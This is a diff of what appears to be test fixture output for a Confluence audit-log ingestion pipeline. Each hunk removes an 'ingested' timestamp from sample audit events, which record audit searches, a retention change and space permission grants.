@@ -10957,7 +10838,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837570545Z", "original": "{\"timestamp\":\"2021-11-23T00:38:57.393Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"49 - 59\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:57.380777Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"11\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.294Z - 2021-11-23T00:38:42.240Z\"}]}", "type": "info", "kind": "event" 
@@ -11041,7 +10921,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837571509Z", "original": "{\"timestamp\":\"2021-11-23T00:38:42.240Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"49 - 58\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:42.224135Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.294Z - 2021-11-23T00:38:35.211Z\"}]}", "type": "info", "kind": "event" 
@@ -11125,7 +11004,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837572419Z", "original": "{\"timestamp\":\"2021-11-23T00:38:35.211Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 57\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:35.065543Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"57\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:35:04.387Z\"}]}", "type": "info", "kind": "event" 
@@ -11172,7 +11050,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:46:29.837573682Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.387Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Retention\",\"i18nKey\":\"atlassian.audit.event.change.retention\",\"to\":\"3 Years\"}],\"system\":\"http://confluence.internal:8090\",\"method\":\"System\",\"extraAttributes\":[]}", "type": [ "admin", @@ -11267,7 +11144,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837574544Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.306Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -11363,7 +11239,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837575415Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.305Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -11452,7 +11327,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837576345Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.303Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -11548,7 +11422,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837577272Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.301Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -11644,7 +11517,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837578153Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.299Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -11733,7 +11605,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837579031Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.298Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -11829,7 +11700,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837579907Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.296Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -11925,7 +11795,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837580848Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.294Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -12014,7 +11883,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837581766Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.292Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -12110,7 +11978,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837582823Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.290Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -12206,7 +12073,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837583767Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.288Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -12295,7 +12161,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837584647Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.287Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -12391,7 +12256,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837585521Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.285Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -12487,7 +12351,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837586397Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.283Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -12576,7 +12439,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837587322Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.281Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -12672,7 +12534,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837588727Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.279Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -12768,7 +12629,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837589711Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.277Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -12857,7 +12717,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837590588Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.275Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -12953,7 +12812,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837591452Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.273Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -13049,7 +12907,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837592325Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.271Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
